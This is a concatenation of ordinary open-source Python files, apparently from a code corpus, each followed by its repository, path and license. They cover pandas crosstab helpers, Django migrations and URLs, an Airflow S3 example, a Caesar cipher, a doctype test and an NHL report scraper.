elif normalize == "all" or normalize is True:
column_margin = column_margin / column_margin.sum()
index_margin = index_margin / index_margin.sum()
index_margin.loc[margins_name] = 1
table = concat([table, column_margin], axis=1)
table = table.append(index_margin)
table = table.fillna(0)
table.index = table_index
table.columns = table_columns
else:
raise ValueError("Not a valid normalize argument")
else:
raise ValueError("Not a valid margins argument")
return table
def _get_names(arrs, names, prefix: str = "row"):
if names is None:
names = []
for i, arr in enumerate(arrs):
if isinstance(arr, ABCSeries) and arr.name is not None:
names.append(arr.name)
else:
names.append(f"{prefix}_{i}")
else:
if len(names) != len(arrs):
raise AssertionError("arrays and names must have the same length")
if not isinstance(names, list):
names = list(names)
return names
def _build_names_mapper(
rownames: list[str], colnames: list[str]
) -> tuple[dict[str, str], list[str], dict[str, str], list[str]]:
"""
Given the names of a DataFrame's rows and columns, returns a set of unique row
and column names and mappers that convert to original names.
A row or column name is replaced if it is duplicate among the rows of the inputs,
among the columns of the inputs or between the rows and the columns.
Parameters
----------
rownames: list[str]
colnames: list[str]
Returns
-------
Tuple(Dict[str, str], List[str], Dict[str, str], List[str])
rownames_mapper: dict[str, str]
a dictionary with new row names as keys and original rownames as values
unique_rownames: list[str]
a list of rownames with duplicate names replaced by dummy names
colnames_mapper: dict[str, str]
a dictionary with new column names as keys and original column names as values
unique_colnames: list[str]
a list of column names with duplicate names replaced by dummy names
"""
def get_duplicates(names):
seen: set = set()
return {name for name in names if name not in seen}
shared_names = set(rownames).intersection(set(colnames))
dup_names = get_duplicates(rownames) | get_duplicates(colnames) | shared_names
rownames_mapper = {
f"row_{i}": name for i, name in enumerate(rownames) if name in dup_names
}
unique_rownames = [
f"row_{i}" if name in dup_names else name for i, name in enumerate(rownames)
]
colnames_mapper = {
f"col_{i}": name for i, name in enumerate(colnames) if name in dup_names
}
unique_colnames = [
f"col_{i}" if name in dup_names else name for i, name in enumerate(colnames)
]
return rownames_mapper, unique_rownames, colnames_mapper, unique_colnames
| jorisvandenbossche/pandas | pandas/core/reshape/pivot.py | Python | bsd-3-clause | 26,402 |
class formatCoord:
def __init__(self,X):
self.X = X
self.numrows,self.numcols=self.X.shape[0:2]
def update_coord(self, x, y):
col = int(x+0.5)
row = int(y+0.5)
if col>=0 and col<self.numcols and row>=0 and row<self.numrows:
z = self.X[row,col]
try:
return 'x=%1.4f, y=%1.4f, z=%s '%(x, y, ' '.join(map(str,z)))
except TypeError:
return 'x=%1.4f, y=%1.4f, z=%s '%(x, y, z)
else:
return 'x=%1.4f, y=%1.4f'%(x, y)
| ChellyD65/patchSorter | lib/formatCoord.py | Python | gpl-2.0 | 556 |
__author__ = 'stuartreid'
class switch(object):
"""
This class provides the functionality we want. You only need to look at
this if you want to know how this works. It only needs to be defined
once, no need to muck around with its internals.
"""
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False | StuartGordonReid/Comp-Finance | Helpers/Switch.py | Python | lgpl-3.0 | 786 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-29 14:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('genevieve_client', '0004_auto_20160328_1526'),
]
operations = [
migrations.CreateModel(
name='GenevieveUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('genome_upload_enabled', models.BooleanField(default=False)),
('agreed_to_terms', models.BooleanField(default=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='gennoteseditor',
name='genome_upload_enabled',
),
]
| PersonalGenomesOrg/genevieve | genevieve_client/migrations/0005_auto_20160329_1420.py | Python | mit | 1,067 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Django_study.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| zhangyage/Python-oldboy | day13/Django_study/manage.py | Python | apache-2.0 | 255 |
"""
A crypto engine for the 21st century.
"""
import sys
import string
sigma = {chr(65+i): i for i in range(26)}
rotation = None
plain = ''
cypher = ''
codes = []
newCodes = []
cypherList = []
while rotation is None:
try:
rotation = int(input("Choose a number for your cypher: "))
except ValueError:
rotation = int(input("Please choose a number. The number may be positive or negative: "))
continue
if rotation % 26 == 0:
cont = input('This operation will return your message exactly. Continue? [y]es or [n]o: ')
if cont == 'y':
pass
elif cont == 'n':
print("Exiting...")
sys.exit()
elif rotation > 26:
print('The maximum rotation is 26; your number will be treated as if it were {0}.'\
.format(str(rotation % 26)))
mod = rotation % 26
plain = input("Choose a message: ").upper()
for i in plain:
if i == ' ':
codes.append(' ')
elif i in string.punctuation:
codes.append(i)
else:
codes.append(sigma[i])
for i in codes:
if type(i) is int:
newCodes.append((i + mod) % 26)
else:
newCodes.append(i)
for i in newCodes:
if type(i) is int:
cypherList.append(chr(65+i))
else:
cypherList.append(i)
cypher = ''.join(cypherList)
print(cypher)
| caioproiete/illacceptanything | code/libcrypto.py | Python | mit | 1,304 |
# pylint: disable=E1120, C0103
from django.conf.urls import url
from thegamesdb import views
urlpatterns = [
url(r'^$', views.search, name='tgb.search'),
url(r'^search.json', views.search_json, name='tgd.search_json'),
url(r'^(\d+).json$', views.detail_to_lutris, name='tgd.detail'),
]
| Turupawn/website | thegamesdb/urls.py | Python | agpl-3.0 | 300 |
# Generated by Django 2.0.6 on 2018-11-09 14:02
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('iati', '0056_auto_20181109_1400'),
]
operations = [
migrations.RenameField(
model_name='documentlink',
old_name='period_target',
new_name='result_indicator_period_target',
),
]
| openaid-IATI/OIPA | OIPA/iati/migrations/0057_auto_20181109_1402.py | Python | agpl-3.0 | 397 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from unittest import TestCase, main
from nine import str
from kajiki.doctype import DocumentTypeDeclaration, extract_dtd
XHTML1 = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ' \
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
class TestDTD(TestCase):
def test_dtd(self):
dtd = DocumentTypeDeclaration.by_uri['']
assert dtd.name == 'html5'
assert str(dtd) == '<!DOCTYPE html>', str(dtd)
assert dtd.rendering_mode == 'html5'
dtd = DocumentTypeDeclaration.by_uri[None]
assert dtd.name == 'xhtml5'
assert str(dtd) == '<!DOCTYPE html>', str(dtd)
assert dtd.rendering_mode == 'xml'
dtd = DocumentTypeDeclaration.by_uri[
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"]
assert dtd.name == 'xhtml1transitional'
assert str(dtd) == XHTML1
assert dtd.rendering_mode == 'xml'
def test_extract_dtd(self):
html = '<div>Test template</div>'
markup = XHTML1 + html
extracted, pos, rest = extract_dtd(markup) # The function being tested
assert extracted == XHTML1
assert pos == 0
assert rest == html
dtd = DocumentTypeDeclaration.matching(extracted) # Another function
assert dtd is DocumentTypeDeclaration.by_uri[
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"]
if __name__ == '__main__':
main()
| ollyc/kajiki | kajiki/tests/test_doctype.py | Python | mit | 1,604 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from airflow import models
from airflow.providers.amazon.aws.transfers.local_to_s3 import LocalFilesystemToS3Operator
from airflow.utils.dates import datetime
S3_BUCKET = os.environ.get("S3_BUCKET", "test-bucket")
S3_KEY = os.environ.get("S3_KEY", "key")
with models.DAG(
"example_local_to_s3",
schedule_interval=None,
start_date=datetime(2021, 1, 1), # Override to match your needs
catchup=False,
) as dag:
# [START howto_local_transfer_data_to_s3]
create_local_to_s3_job = LocalFilesystemToS3Operator(
task_id="create_local_to_s3_job",
filename="relative/path/to/file.csv",
dest_key=S3_KEY,
dest_bucket=S3_BUCKET,
)
# [END howto_local_transfer_data_to_s3]
| Acehaidrey/incubator-airflow | airflow/providers/amazon/aws/example_dags/example_local_to_s3.py | Python | apache-2.0 | 1,523 |
import logging
from processing.processor import DataProcessor
PROCESSORS = (
# TODO: Implement
)
def run(media_id=None):
logger = logging.getLogger(__name__)
logger.info('generate play media for Media.id=%s', media_id)
result = DataProcessor(PROCESSORS, logger=logger).run(media_id=media_id)
# TODO: Mark media as ready for "play"
"""Optimize media for web, e.g. transcode video (multiple codecs) and pack images, find good screenshot"""
"""Extract screenshot of the video"""
# See http://superuser.com/questions/538112/meaningful-thumbnails-for-a-video-using-ffmpeg
# TODO: Implement generating content, optimized for viewing in browser, e.g. max 2880 x 1800, jpeg / mp4
# TODO: Consider generating "original rotated" media, identical with quality but ready for usage
| askoretskiy/private-photo-cloud | backend/processing/play_media/__init__.py | Python | gpl-3.0 | 814 |
"""
E261
Include at least two spaces before inline comment
"""
| landscape-test/all-messages | messages/pep8/E261.py | Python | unlicense | 64 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
_____ __
/ \ / |
/$$$$$$ |$$ | ______ _______ _______ __ __
$$ | $$/ $$ | / \ / |/ |/ | / |
$$ | $$ | $$$$$$ |/$$$$$$$//$$$$$$$/ $$ | $$ |
$$ | __ $$ | / $$ |$$ \$$ \ $$ | $$ |
$$ \__/ |$$ |/$$$$$$$ | $$$$$$ |$$$$$$ |$$ \__$$ |
$$ $$/ $$ |$$ $$ |/ $$// $$/ $$ $$ |
$$$$$$/ $$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$ |
/ \__$$ |
$$ $$/
$$$$$$/
'''
from distutils.core import setup
import Classy
import os
import sys
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
if sys.argv[-1] == 'uninstall':
os.system('pip uninstall Classy')
sys.exit()
if sys.argv[-1] == "install":
os.system('pip install Classy')
sys.exit()
setup(
name='Classy',
version= Classy.__version__,
author='Philip Deuchler',
author_email='pbdeuchler@gmail.com',
packages=['Classy'],
package_data={'': ['LICENSE', 'README.rst']},
scripts=[],
url='http://pypi.python.org/pypi/classy/',
license=open('LICENSE.txt').read(),
description='Abstracted naive Bayes classifier for rest of us (Requires Python 2.7 or later)',
long_description= open('README.rst').read() + '\n\n' +
open('HISTORY.rst').read(),
install_requires=[],
) | pbdeuchler/Classy | setup.py | Python | isc | 1,449 |
# Copyright (c) 2015-2019 Jack Morton <jhm@jemscout.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
from bs4 import BeautifulSoup
from urllib.request import urlopen, Request
import nhlscrappo.constants as C
from nhlscrappo import GameType, ReportType
class ReportFetcher(object):
"""Responsible for fetching and validating the report fields"""
__docroot = "http://www.nhl.com/"
def __init__(self, season, game_num, game_type, report_type):
self.season = season
self.game_num = game_num
self.game_type = game_type
self.report_type = report_type
self.soup = None
def __random_user_agent(self):
user_agent_list = [ \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, " \
"like Gecko) Chrome/22.0.1207.1 Safari/537.1", \
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 " \
"(KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 "\
"(KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like " \
"Gecko) Chrome/20.0.1090.0 Safari/536.6", \
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, " \
"like Gecko) Chrome/19.77.34.5 Safari/537.1", \
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like " \
"Gecko) Chrome/19.0.1084.9 Safari/536.5", \
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like " \
"Gecko) Chrome/19.0.1084.36 Safari/536.5", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, " \
"like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1063.0 Safari/536.3",\
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3" \
" (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1062.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, " \
"like Gecko) Chrome/19.0.1062.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1061.1 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, " \
"like Gecko) Chrome/19.0.1061.1 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1061.1 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1061.0 Safari/536.3", \
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like " \
"Gecko) Chrome/19.0.1055.1 Safari/535.24", \
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, " \
"like Gecko) Chrome/19.0.1055.1 Safari/535.24"]
return random.choice(user_agent_list)
def __load_html(self, url):
if "http://" in url:
req = Request(url, headers = {
"User-Agent": self.__random_user_agent(), \
"Accept": "text/html,application/xhtml+xml,application/" \
"xml;q=0.9,*/*;q=0.8", \
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3", \
"Accept-Encoding": "none", \
"Accept-Language": "en-US,en;q=0.8", \
"Connection": "keep-alive"})
with urlopen(req) as handle:
html = handle.read()
handle.close()
return BeautifulSoup(html.decode("utf-8", "lxml"))
else:
with open(url, "r") as handle:
html = handle.read()
handle.close()
return BeautifulSoup(html, features="lxml")
def make_soup(self, local = None):
if local:
self.soup = self.__load_html(local)
else:
url = self.__docroot + "scores/htmlreports/" + str(self.season) + \
str(self.season + 1) + "/" + self.report_type.value + "0" + \
str(self.game_type.value) + ("%04i" % self.game_num) + ".HTM"
self.soup = self.__load_html(url)
return self.soup
@property
def season(self):
return self._season
@season.setter
def season(self, value):
if not isinstance(value, int):
raise TypeError("season must be of type int")
if value < C.MIN_SEASON or value > C.MAX_SEASON:
raise ValueError("Only seasons starting from " + \
str(C.MIN_SEASON) + " until " + str(C.MAX_SEASON) + \
" are supported")
self._season = int(value)
@property
def game_num(self):
return self._game_num
@game_num.setter
def game_num(self, value):
if not isinstance(value, int):
raise TypeError("game_num must be of type int")
self._game_num = value
@property
def game_type(self):
return self._game_type
@game_type.setter
def game_type(self, value):
if value in GameType:
self._game_type = value
else:
raise TypeError("game_type must be of type GameType")
@property
def report_type(self):
return self._report_type
@report_type.setter
def report_type(self, value):
if value in ReportType:
self._report_type = value
else:
raise TypeError("report_type must be of type ReportType")
@property
def soup(self):
return self._soup
@soup.setter
def soup(self, value):
if value is not None and not isinstance(value, BeautifulSoup):
raise TypeError("soup must be of type BeautifulSoup")
self._soup = value
| jhm-/nhlscrappo | nhlscrappo/fetcher.py | Python | mit | 7,149 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.